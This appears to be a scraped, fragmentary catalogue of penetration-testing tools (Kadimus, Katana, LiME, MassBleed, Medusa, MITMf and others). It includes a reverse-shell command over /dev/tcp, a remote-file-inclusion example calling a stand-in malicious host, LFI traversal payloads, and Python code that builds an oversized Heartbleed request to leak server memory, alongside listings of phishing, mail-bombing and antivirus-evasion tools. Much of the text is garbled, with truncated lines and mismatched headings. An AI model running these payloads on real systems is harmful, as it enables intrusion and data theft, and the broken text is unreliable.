snortrules-snapshot-2962.tar.gz.md5
-rw-------.
1 root root
-rw-------.
1 root root
yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.
1 root root
1014 Out
6 00:33
yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.
1 root root
543 Out
6 02:14
yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.
1 root root
yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.
1 root root
yum_save_tx-2014-10-15-16-004hKzCF.yumtx
[Type commands or "exit" to finish]
Shell>
Download JexBoss
JOHNNY - GUI FOR JOHN THE RIPPER
Download Johnny
JOOMLAVS - A BLACK BOX, JOOMLA VULNERABILITY
SCANNER
--basic-auth
Enumeration options
-a, --scan-all
extensions
-c, --scan-components
-m, --scan-modules
-t, --scan-templates
-q, --quiet
methods
Advanced options
--follow-redirection    Automatically follow redirections
--no-colour
--proxy
<[protocol://]host:port> HTTP,
authentication credentials
--threads
Download Joomlavs
JSQL INJECTION V0.73 - JAVA TOOL FOR AUTOMATIC
penetration distribution.
jSQL is also included in Black Hat Sec, ArchAssault Project,
BlackArch Linux and Cyborg Hawk Linux.
CHANGE LOG
Coming... i18n arabic russian chinese integration,
next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and
Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16
db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db
vendors supported: MySQL Oracle SQLServer PostgreSQL
DB2 Firebird Informix Ingres MaxDb Sybase. JUnit
tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...),
Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for
webshell commands, Configuration backup, Update
checker.
0.2 Time based algorithm, Multi-thread control (start
pause resume stop), Shows URL calls.
Ideally, you should be able to run the setup script, and it will
install everything you need.
For the Shodan information gathering module, YOU WILL
NEED a Shodan API key. This costs like $9 bucks, come on
now, it's worth it :).
Usage
DownloadJust-Metadata
KADIMUS - LFI SCAN & EXPLOIT TOOL
Compile:
Installing libcurl:
CentOS/Fedora
# yum install libcurl-devel
Debian based
Installing libpcre:
CentOS/Fedora
Debian based
Installing libssh:
CentOS/Fedora
# yum install libssh-devel
Debian based
And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make
Options:
-h, --help
Request:
-B, --cookie STRING
header
-A, --user-agent STRING    User-Agent to send to server
--connect-timeout SECONDS
connection
--retry-times NUMBER
if connection fails
--proxy STRING    protocol://hostname:port
Scanner:
-u, --url STRING
scan
results
--threads NUMBER
Number of threads
(2..1000)
Explotation:
-t, --target STRING
Vulnerable Target to
exploit
--injec-at STRING
exploit
(only need with RCE data
and source disclosure)
RCE:
-X, --rce-technique=TECH
use
execute, with php brackets
-c, --cmd STRING
connection.
-l, --listen NUMBER
port to listen
-b, --bind-shell
shell
-i, --connect-to STRING
Ip/Hostname to connect
--ssh-port NUMBER
proc/self/environ
input
php://input
auth
var/log/auth.log
data
data://text
Source Disclosure:
-G, --get-source
using filter://
-f, --filename STRING
source [REQUIRED]
-O FILE
stdout)
Examples:
Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0
Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost
You can also check for RFI: put the remote URL in resource/common_files.txt together with the regex that identifies it. For a remote file with these contents:
/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
the line in resource/common_files.txt is:
http://bad-url.com/shell.txt?:scorpion say get over here
(the base64 decodes to "scorpion say get over here", which is the string the regex must find in the response).
Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
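A minimal LFI scanner in the spirit of the -u mode above, as an added example that is not Kadimus' own code. It runs against a constructed in-memory target that emulates an unsanitised include($_GET['pg']) over a fake filesystem, so it works offline; the payload list, the fingerprints (the root:x:0:0: line of /etc/passwd, a NUL-separated /proc/self/environ, and PHP's "failed to open stream" warning) and the mock application are the example's own assumptions, not Kadimus' internals.

```python
"""LFI scanner against a constructed vulnerable target (added example, not Kadimus code)."""
import re
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse

# Constructed fake filesystem standing in for the target's disk.
FAKE_FS = {
    "/var/www/html/contact.php": "<h1>Contact us</h1>",
    "/var/www/html/index.php": "<h1>Home</h1>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/proc/self/environ": "PATH=/usr/bin\x00HTTP_USER_AGENT=Mozilla/5.0\x00",
}
WEBROOT = "/var/www/html"


def _resolve(pg):
    """Resolve the include path the way the kernel would: relative to the
    webroot, with ../ collapsed and excess ../ absorbed at the root."""
    path = pg if pg.startswith("/") else WEBROOT + "/" + pg
    parts = []
    for seg in path.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)


def mock_vulnerable_app(url):
    """Emulates `include($_GET['pg'])` with no sanitising (the fetch callback
    used by the scanner; a real scan would do an HTTP GET here)."""
    query = dict(parse_qsl(urlparse(url).query))
    pg = query.get("pg", "index.php")
    resolved = _resolve(pg)
    if resolved in FAKE_FS:
        return FAKE_FS[resolved]
    return f"Warning: include({pg}): failed to open stream: No such file or directory"


# Traversal depths 1..7 plus two absolute targets; environ is the same file the
# "environ" RCE technique later poisons through the User-Agent header.
PAYLOADS = ["../" * n + "etc/passwd" for n in range(1, 8)] + ["/etc/passwd", "/proc/self/environ"]

# Evidence patterns, checked in order; the PHP warning is the weakest signal.
SIGNATURES = {
    "/etc/passwd": re.compile(r"root:x:0:0:"),
    "/proc/self/environ": re.compile(r"(PATH|HTTP_USER_AGENT)=[^\x00]*\x00"),
    "php_include_error": re.compile(r"failed to open stream"),
}


def set_param(url, name, value):
    """Return url with query parameter `name` replaced by `value`."""
    parts = urlparse(url)
    query = dict(parse_qsl(parts.query))
    query[name] = value
    return urlunparse(parts._replace(query=urlencode(query)))


def scan_lfi(url, fetch):
    """Try every payload in every query parameter of `url`.
    Returns a list of (parameter, payload, evidence_label) findings."""
    findings = []
    for name in dict(parse_qsl(urlparse(url).query)):
        for payload in PAYLOADS:
            body = fetch(set_param(url, name, payload))
            for label, pattern in SIGNATURES.items():
                if pattern.search(body):
                    findings.append((name, payload, label))
                    break
    return findings


if __name__ == "__main__":
    for finding in scan_lfi("http://localhost/?pg=contact.php", mock_vulnerable_app):
        print(finding)
```

The depth-1 and depth-2 traversals only produce the PHP warning (the path lands in /var/www/etc/passwd and /var/etc/passwd), which is the "possible LFI" signal; the depth-3 payload and the absolute paths return the file itself, which is the confirmed finding to report.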
Download Kadimus
KALI LINUX 1.1.0 - THE BEST PENETRATION TESTING
DISTRIBUTION
So, what's new in Kali 2.0? There's a new 4.0 kernel, now based on Debian Jessie, improved hardware and wireless driver coverage, support for a variety of desktop environments (GNOME, KDE, Xfce, MATE, e17, LXDE, i3wm), updated desktop environment and tools, and the list goes on.
Kali Linux is Now a Rolling Distribution
One of the biggest moves we've taken to keep Kali 2.0 up to date in a global, continuous manner is transforming Kali into a rolling distribution. What this means is that we are pulling our packages continuously from Debian Testing (after making sure that all packages are installable), essentially upgrading the Kali core system, while allowing us to
Through our Live Build process, Kali 2.0 now natively supports KDE, GNOME 3, Xfce, MATE, e17, LXDE and i3wm. We've moved on to GNOME 3 in this release, marking the end of a long abstinence period. We've finally embraced GNOME 3 and, with a few custom changes, it's grown to be our favourite desktop environment. We've added custom support for multilevel menus, true terminal transparency, as well as a handful of useful GNOME Shell extensions. This however has come at a price: the minimum RAM requirement for a full GNOME 3 session has increased to 768 MB. This is a non-issue on modern hardware but can be detrimental on lower-end machines. For this reason, we have also released an official, minimal Kali 2.0 ISO. This light flavour of Kali includes a handful of useful tools together with the lightweight Xfce desktop environment, a perfect solution for resource-constrained computers.
Kali Linux 2.0 ARM Images & NetHunter 2.0
The whole ARM image section has been updated across the board with Kali 2.0, including Raspberry Pi, Chromebooks, Odroids, the whole lot! In the process, we've added some new images such as the latest Chromebook Flip. Another helpful change we've implemented in our ARM images is including kernel sources, for easier compilation of new drivers.
We haven't forgotten about NetHunter, our favourite mobile penetration testing platform, which also got an update and now includes Kali 2.0. With this, we've released a whole barrage of new NetHunter images for Nexus 5, 6, 7, 9, and 10. The OnePlus One NetHunter image has also been updated to Kali 2.0 and now has a much awaited image for CM12 as well; check the Offensive Security NetHunter page for more information.
Updated VMware and VirtualBox Images
Yes, you can upgrade Kali 1.x to Kali 2.0! To do this, you will need to edit your sources.list entries and run a dist-upgrade as shown below. If you have been using incorrect or extraneous Kali repositories, or otherwise manually installed or overwritten Kali packages outside of apt, your upgrade to Kali 2.0 may fail. This includes scripts like lazykali.sh, PTF, manual git clones in incorrect directories, etc. All of these will clobber existing files on the filesystem and result in a failed upgrade. If this is the case for you, you're better off reinstalling your OS from scratch.
Otherwise, feel free to:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates
main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot
MAIN FILES
--core
  Setting.py
  design.py
  Errors.py
  ping.py
--- Functions
--scripts
  __init__.py
REQUIREMENTS
OS requirement:
Kali Linux
INSTALLATION
Installation of Katana framework:
git clone https://github.com/RedToor/katana.git
cd Katana
chmod 777 install.py
python install.py
(chmod +x install.py is all that is needed to run the script; mode 777 additionally makes it world-writable, which nothing here requires.)
USAGE COMMANDS
Command                                        Progress   Status
Stable:
./sudo ktf.console                             98%        Built - Enabled
./sudo ktf.run -m net/arpspoof                 95%        Built - Enabled
Building:
ktf.lab                                        30%        Built - Not yet
ktf.linker -m web/whois -t google.com -p 80    80%        Built - Not yet
MODULES (SCRIPTS)
Code Name       Description                     Author       Version
web/httpbt                                      Redtoor      1.0
web/formbt                                      Redtoor      1.0
web/cpfinder                                    Redtoor      1.0
web/joomscan                                    Redtoor      1.0
web/dos                                         Redtoor      1.0
web/whois       Who-is web                      Redtoor      1.0
net/arpspoof    ARP-Spoofing attack             Redtoor      1.0
net/arplook     ARP-Spoofing detector           cl34r        1.0
net/portscan    Port Scanner                    RedToor      1.0
set/gdreport    Getting information with web    RedToor      3.0
set/mailboom    E-mail bombing / SPAM           RedToor      3.0
set/facebrok    Facebook phishing platform      RedToor      1.7
fle/brutezip                                    LeSZO ZerO   1.0
fle/bruterar                                    LeSZO ZerO   1.0
clt/ftp                                         Redtoor      1.0
clt/sql                                         Redtoor      1.0
clt/pop3                                        Redtoor      1.0
clt/ftp                                         Redtoor      1.0
ser/sql                                         Redtoor      1.0
ser/apache                                      Redtoor      1.0
ser/ssh                                         Redtoor      1.0
fbt/ftp                                         Redtoor      1.0
fbt/ssh                                         Redtoor      1.0
fbt/sql                                         Redtoor      1.0
fbt/pop3                                        Redtoor      1.0
LINKS
Project in SF : http://sourceforge.net/projects/katanas/
files/
Documentation: https://github.com/RedToor/Katana/tree/
master/doc
Blog of project[ES]: http://cave-rt.blogspot.com.co/
2015/07/instalacion-y-uso-katana-framework.html
Download Katana
KATOOLIN - AUTOMATICALLY INSTALL ALL KALI LINUX
TOOLS
Requirements
Python 2.7
An operating system (tested on Ubuntu)
Installation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp
katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
Usage
DownloadKatoolin
KEEFARCE - EXTRACTS PASSWORDS FROM A KEEPASS
2.X DATABASE, DIRECTLY FROM MEMORY
Download KeeFarce
KEYBOX - A WEB-BASED SSH CONSOLE THAT
CENTRALLY MANAGES ADMINISTRATIVE ACCESS TO
SYSTEMS
for Windows
set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%
Start KeyBox
for Linux/Unix/OSX
./startKeyBox.sh
for Windows
startKeyBox.bat
Steps:
1. Create systems
2. Create profiles
3. Assign systems to profile
4. Assign profiles to users
5. Users can login to create sessions on assigned systems
6. Start a composite SSH session or create and execute a
script across multiple sessions
7. Add additional public keys to systems
8. Disable any adminstrative public key forcing key rotation.
9. Audit session history
DownloadKeyBox
KING PHISHER - PHISHING CAMPAIGN TOOLKIT
DownloadKing Phisher
KUNAI - PWNING & INFO GATHERING VIA USER
BROWSER
Example configs
DownloadKunai
LIME - LINUX MEMORY EXTRACTOR
Usage
insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"
path (required): either a file to write the capture to or tcp:<port> to serve it over the network
Examples
In this example we use adb to load LiME and then start it with
acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime
format=lime"
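A parser for the "lime" output format selected above (format=lime), as an added example that is not part of LiME itself. The header layout it relies on is the one in LiME's lime.h: a 32-byte little-endian record per physical RAM range (magic 0x4C694D45, version 1, inclusive start and end addresses, 8 reserved bytes) followed by the range's bytes. The sample image is constructed by build_lime() inside the block, and the address values in it are the example's own.

```python
"""Walk a LiME-format memory dump range by range (added example, not LiME code)."""
import struct

LIME_MAGIC = 0x4C694D45          # appears as "EMiL" on disk (little-endian)
LIME_VERSION = 1
# magic, version, s_addr, e_addr, reserved[8]; e_addr is the last byte of the range
LIME_HEADER = struct.Struct("<IIQQ8s")


def parse_lime(data):
    """Return [(s_addr, e_addr, payload_bytes), ...]; raise ValueError on a bad
    magic, an unknown version or a range whose bytes were cut short."""
    ranges, off = [], 0
    while off < len(data):
        if len(data) - off < LIME_HEADER.size:
            raise ValueError(f"truncated header at offset {off:#x}")
        magic, version, s_addr, e_addr, _reserved = LIME_HEADER.unpack_from(data, off)
        if magic != LIME_MAGIC:
            raise ValueError(f"bad magic {magic:#010x} at offset {off:#x}")
        if version != LIME_VERSION:
            raise ValueError(f"unsupported header version {version}")
        if e_addr < s_addr:
            raise ValueError(f"range end {e_addr:#x} before start {s_addr:#x}")
        off += LIME_HEADER.size
        size = e_addr - s_addr + 1
        if len(data) - off < size:
            raise ValueError(f"range {s_addr:#x}-{e_addr:#x} truncated "
                             f"({len(data) - off} of {size} bytes)")
        ranges.append((s_addr, e_addr, data[off:off + size]))
        off += size
    return ranges


def validate_lime(data):
    """None if the image parses cleanly, otherwise the error text. Worth running
    before analysis: a truncated last range usually means the adb forward / tcp
    transfer was cut off before the module finished writing."""
    try:
        parse_lime(data)
    except ValueError as exc:
        return str(exc)
    return None


def read_physical(ranges, paddr, length):
    """Bytes at a physical address, or None if it falls in a hole between ranges."""
    for s_addr, e_addr, payload in ranges:
        if s_addr <= paddr <= e_addr:
            return payload[paddr - s_addr:paddr - s_addr + length]
    return None


def build_lime(chunks):
    """Inverse of parse_lime; chunks is [(s_addr, payload_bytes), ...]."""
    out = bytearray()
    for s_addr, payload in chunks:
        out += LIME_HEADER.pack(LIME_MAGIC, LIME_VERSION, s_addr,
                                s_addr + len(payload) - 1, b"\x00" * 8)
        out += payload
    return bytes(out)


# Constructed two-range image: one low range and one above a hole, like /proc/iomem
# "System RAM" entries separated by reserved regions.
SAMPLE_IMAGE = build_lime([(0x1000, b"A" * 0x100), (0x100000, b"B" * 0x80)])

if __name__ == "__main__":
    for s_addr, e_addr, payload in parse_lime(SAMPLE_IMAGE):
        print(f"{s_addr:#018x}-{e_addr:#018x}  {len(payload)} bytes")
    print("valid" if validate_lime(SAMPLE_IMAGE) is None else "corrupt")
```

With format=raw or format=padded there are no headers to check, which is why the lime format is the one to prefer when the acquisition travels over a network: a short transfer shows up as a truncated range instead of a silently shorter file.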
Download Lime
LINSET - WPA/WPA2 HACK WITHOUT BRUTE FORCE
How it works
DownloadLINSET
LMD - LINUX MALWARE DETECT
Linux Malware Detect (LMD) is a malware scanner for Linux
released under the GNU GPLv2 license, that is designed
around the threats faced in shared hosted environments. It
uses threat data from network edge intrusion detection systems
to extract malware that is actively being used in attacks and
generates signatures for detection. In addition, threat data is
also derived from user submissions with the LMD checkout
feature and from malware community resources. The
signatures that LMD uses are MD5 file hashes and HEX pattern
matches, they are also easily exported to any number of
detection tools such as ClamAV.
The driving force behind LMD is that there is currently limited
availability of open source/restriction free tools for Linux
systems that focus on malware detection and more important
Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, 6,931 (78%) went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58%, with low and high detection rates of 10% and 100% respectively. There could not be a clearer statement of the need for an open and community-driven malware remediation project that focuses on the threat landscape of multi-user shared environments.
Features:
... or FILE
kernel inotify monitor convenience feature to monitor system users
kernel inotify monitor can be restricted to a configurable user html root
kernel inotify monitor with dynamic sysctl limits for optimal performance
kernel inotify alerting through daily and/or optional weekly reports
e-mail alert reporting after every scan execution (manual & daily)
path, extension and signature based ignore options
background scanner option for unattended scan operations
verbose logging & output of all actions
Source Data:
The LMD signature are updated typically once per day or more
frequently depending on incoming threat data from the LMD
checkout feature, IPS malware extraction and other sources.
The updating of signatures in LMD installations is performed
daily through the default cron.daily script with the update
option, which can be run manually at any time.
An RSS feed is available for tracking malware threat updates:
http://www.rfxn.com/api/lmd
Detected Threats:
bin.dccserv.irsexxy
bin.fakeproc.Xnuxer
bin.ircbot.nbot
bin.ircbot.php3
bin.ircbot.unclassed
bin.pktflood.ABC123
bin.pktflood.osf
bin.trojan.linuxsmalli
c.ircbot.tsunami
exp.linux.rstb
exp.linux.unclassed
exp.setuid0.unclassed
gzbase64.inject
html.phishing.auc61
html.phishing.hsbc
perl.connback.DataCha0s
perl.connback.N2
perl.cpanel.cpwrap
perl.ircbot.atrixteam
perl.ircbot.bRuNo
perl.ircbot.Clx
perl.ircbot.devil
perl.ircbot.fx29
perl.ircbot.magnum
perl.ircbot.oldwolf
perl.ircbot.putr4XtReme
perl.ircbot.rafflesia
perl.ircbot.UberCracker
perl.ircbot.xdh
perl.ircbot.xscan
perl.mailer.yellsoft
perl.shell.cbLorD
perl.shell.cgitelnet
php.cmdshell.c100
php.cmdshell.c99
php.cmdshell.cih
php.cmdshell.egyspider
php.cmdshell.fx29
php.cmdshell.ItsmYarD
php.cmdshell.Ketemu
php.cmdshell.N3tshell
php.cmdshell.r57
php.cmdshell.unclassed
php.defash.buno
php.exe.globals
php.include.remote
php.ircbot.InsideTeam
php.ircbot.lolwut
php.ircbot.sniper
php.ircbot.vj_denie
php.mailer.10hack
php.mailer.bombam
php.mailer.PostMan
php.phishing.AliKay
php.phishing.mrbrain
php.phishing.ReZulT
php.pktflood.oey
php.shell.rc99
php.shell.shellcomm
Real-Time Monitoring:
Download LMD
LOKI - SCANNER FOR SIMPLE INDICATORS OF
COMPROMISE
Reports
-p path          Path to scan
-s kilobyte
--noprocscan
--nofilescan
--noindicator
--debug          Debug output
Download Loki
LUKS-OPS - AUTOMATE THE USAGE OF LUKS VOLUMES
IN LINUX
Default Options:
DownloadLUKS-OPs
LYNIS 2.0.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
Privileged or non-privileged
DownloadLynis 2.0.0
LYNIS 2.1.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
During the scan, technical details about the scan are stored in a
log file. At the same time findings (warnings, suggestions, data
collection), are stored in a report file.
Opportunistic scanning
Many other tools use the same data files for performing tests.
OpenVAS / Nessus
These products focus primarily on vulnerability scanning. They
do this via the network by polling services. Optionally they will
log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper
analysis compared with network based scans. Additionally,
there is no risk for your business processes, and log files
remain clean from connection attempts and incorrect requests.
Although Lynis is an auditing tool, it will actually discover
vulnerabilities as well. It does so by using existing tools and
analyzing configuration files.
Lynis and OpenVAS are both open source and free to use.
Nessus is a closed source and paid.
Benefits of Lynis
Much faster
No pollution of log files, no disruption to business services
Host based scans provides more in-depth audit
Changelog
= Lynis 2.1.0 (2015-04-16) =
General:
Supported operating systems
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several
storage devices!
No installation required
Many other tools use the same data files for performing tests.
Since Lynis is not limited to a few common Linux distributions, it
uses tests from standards and many custom ones not found in
any other tool.
Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian
Gentoo, Red Hat)
Parameters
--auditor "Given name Surname"
-c
--check-update
--cronjob
--help (-h)
--manpage
--nocolors
--pentest             ... privileged)
--quick (-Q)          ... doesn't wait)
--quiet
--reverse-colors      ... lighter backgrounds
--version (-V)
Changelog
Lynis 2.1.1
libarchive-dev
Mac OS X
For compiling Malheur on Mac OS X, a working installation of Xcode including gcc is required. Additionally, the following packages need to be installed via Homebrew: libconfig, libarchive (from homebrew-alt).
OpenBSD
For compiling Malheur on OpenBSD the following packages are required: gmake, libconfig, libarchive. Note that you need to use gmake instead of make for building Malheur.
$ make
$ make check
$ make install
installation
DownloadMALHEUR
MALIGNO V2.0 - METASPLOIT PAYLOAD SERVER
DownloadMaligno v2.0
MALWARE - MALWARE REPOSITORY FRAMEWORK
DownloadMalwaRE
MASSBLEED - MASS SSL VULNERABILITY SCANNER
USAGE
ABOUT
This script has four main functions, with the ability to proxy all connections:
1. Mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
2. Scan any CIDR range for OpenSSL vulnerabilities via any custom port (example: sh massbleed.sh 192.168.0.0/16 port 8443)
3. Individually scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
4. Scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES:
sh massbleed.sh 192.168.0.0/16 0 0 proxy
sh massbleed.sh 192.168.0.0/16 port 8443 proxy
sh massbleed.sh 127.0.0.1 single 0 proxy
sh massbleed.sh 192.168.0. subnet 0 proxy
VULNERABILITIES:
1. OpenSSL Heartbleed vulnerability (CVE-2014-0160)
2. OpenSSL CCS (MITM) vulnerability (CVE-2014-0224)
3. POODLE SSLv3 vulnerability (CVE-2014-3566)
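The target selection of the four modes above and the wire-level checks behind two of the three vulnerabilities, in an added example that is not MassBleed's own code (MassBleed is a shell script driving other tools). The TLS record layout and the heartbeat message format are those of RFC 5246 and RFC 6520; the server responses the test feeds in are constructed byte strings, not captures, and the "subnet" mode's treatment of a trailing-dot prefix as a /24 is the example's own reading of the 192.168.0. form. CCS injection (CVE-2014-0224) needs a live handshake and is not modelled here.

```python
"""Target expansion plus Heartbleed/POODLE response checks (added example, not MassBleed code)."""
import ipaddress
import struct

TLS_ALERT, TLS_HANDSHAKE, TLS_HEARTBEAT = 0x15, 0x16, 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16                      # RFC 6520 minimum padding length


def expand_targets(spec, mode="cidr"):
    """MassBleed's addressing styles: a CIDR ("192.168.0.0/16"), a single host
    (mode "single") or a class C prefix such as "192.168.0." (mode "subnet")."""
    if mode == "single":
        return [str(ipaddress.ip_address(spec))]
    if mode == "subnet":
        spec = spec.rstrip(".") + ".0/24"
    return [str(host) for host in ipaddress.ip_network(spec, strict=False).hosts()]


def build_heartbeat_request(claimed_len=0x4000, payload=b"\x01", version=(3, 2)):
    """TLS record carrying a heartbeat_request whose declared payload_length is far
    larger than the bytes actually sent. An unpatched OpenSSL (CVE-2014-0160) trusts
    the declared length and echoes claimed_len bytes read past the request buffer."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * HB_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def heartbeat_echo_response(payload, version=(3, 2)):
    """What a correct server sends back: the payload, at its true length, plus padding."""
    body = struct.pack("!BH", HB_RESPONSE, len(payload)) + payload + b"\x00" * HB_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


def leaky_server_response(claimed_len):
    """Constructed reply of a vulnerable server: claimed_len bytes of 'heap' (0x41 here)."""
    body = struct.pack("!BH", HB_RESPONSE, claimed_len) + b"\x41" * claimed_len + b"\x00" * HB_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body


def parse_record(buf):
    """Split one TLS record into (content_type, version, body); None if incomplete."""
    if len(buf) < 5:
        return None
    ctype, vmaj, vmin, length = struct.unpack("!BBBH", buf[:5])
    if len(buf) < 5 + length:
        return None
    return ctype, (vmaj, vmin), buf[5:5 + length]


def classify_heartbeat_response(buf, sent_payload_len):
    """'vulnerable' if the server echoed more than it was sent, 'patched' on an alert
    or a correctly sized echo, 'unknown' otherwise. A server that silently drops the
    malformed request (the RFC 6520 behaviour) sends nothing at all, so the caller
    should treat a read timeout as patched too."""
    rec = parse_record(buf)
    if rec is None:
        return "unknown"
    ctype, _version, body = rec
    if ctype == TLS_ALERT:
        return "patched"
    if ctype == TLS_HEARTBEAT and len(body) >= 3 and body[0] == HB_RESPONSE:
        echoed_len = struct.unpack("!H", body[1:3])[0]
        if echoed_len > sent_payload_len and len(body) >= 3 + echoed_len:
            return "vulnerable"
        return "patched"
    return "unknown"


def server_offers_sslv3(server_hello):
    """POODLE (CVE-2014-3566) precheck: True when a ServerHello negotiated SSL 3.0.
    Handshake body: type (1 byte), length (3 bytes), server_version (2 bytes), ..."""
    rec = parse_record(server_hello)
    if rec is None:
        return False
    ctype, _version, body = rec
    return ctype == TLS_HANDSHAKE and len(body) >= 6 and body[0] == 2 and body[4:6] == b"\x03\x00"


if __name__ == "__main__":
    print(len(expand_targets("192.168.0.", "subnet")), "hosts in the class C")
    print(classify_heartbeat_response(leaky_server_response(0x4000), 1))
    print(classify_heartbeat_response(heartbeat_echo_response(b"\x01"), 1))
```

In a live scan the request goes out after the handshake completes, so a single missing response per host is ambiguous (dropped by a correct implementation, or simply slow); repeat the probe once before recording a host as patched.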
DownloadMassBleed
this application:
Thread-based parallel testing. Brute-force testing can be
performed against multiple hosts, users or passwords
concurrently.
Flexible user input. Target information (host/user/
password) can be specified in a variety of ways. For
example, each item can be either a single entry or a file
containing multiple entries. Additionally, a combination file
format allows the user to refine their target listing.
Modular design. Each service module exists as an
independent .mod file. This means that no modifications
are necessary to the core application in order to extend
the supported list of services for brute-forcing.
Why?
AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RDP
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form
News
DownloadMedusa
METASPLOIT AV EVASION - METASPLOIT PAYLOAD
GENERATOR THAT AVOIDS MOST ANTI-VIRUS
PRODUCTS
DownloadMetasploit AV Evasion
MICENUM - MANDATORY INTEGRITY CONTROL
ENUMERATOR FOR WINDOWS
Download MicEnum
MITMF - FRAMEWORK FOR MAN-IN-THE-MIDDLE
ATTACKS
connected clients
Screenshotter - Uses HTML5 Canvas to render an
accurate screenshot of a clients browser
Responder - LLMNR, NBT-NS, WPAD and MDNS
poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP spoofing, ICMP
redirects or DHCP spoofing
BeEFAutorun - Autoruns BeEF modules based on a
client's OS or browser type
AppCachePoison - Perform app cache poisoning attacks
Ferret-NG - Transparently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser
plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables sent over HTTP using
the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with
out-of-date browser plugins
webpages
Replace - Replace arbitrary content in HTML content
SMBAuth - Evoke SMB challenge-response authentication
attempts
Upsidedownternet - Flips images 180 degrees
Installation
If MITMf is not in your distro's repo or you just want the latest
version:
Run the command git clone https://github.com/
byt3bl33d3r/MITMf.git to clone this directory
Run the setup.sh script
Run the command pip install --upgrade -r
requirements.txt to install all Python dependencies
On Kali Linux, if you get an error while installing the pypcap
package or when starting MITMf you see: ImportError: no
module named pcap, run apt-get install python-pypcap to
fix it
DownloadMITMf
MOBAXTERM - TERMINAL FOR WINDOWS WITH X11
SERVER, TABBED SSH CLIENT, NETWORK TOOLS AND
MUCH MORE...
application for your remote tasks, e.g. when you use SSH to
connect to a remote server, a graphical SFTP browser will
automatically pop up in order to directly edit your remote files.
Your remote applications will also display seamlessly on your
Windows desktop using the embedded X server.
You can download and use MobaXterm Home Edition for free.
If you want to use it inside your company, you should consider
subscribing to MobaXterm Professional Edition: this will give
you access to much more features, professional support and
"Customizer" software.
When developing MobaXterm, we focused on a simple aim:
proposing an intuitive user interface in order for you to
efficiently access remote servers through different networks
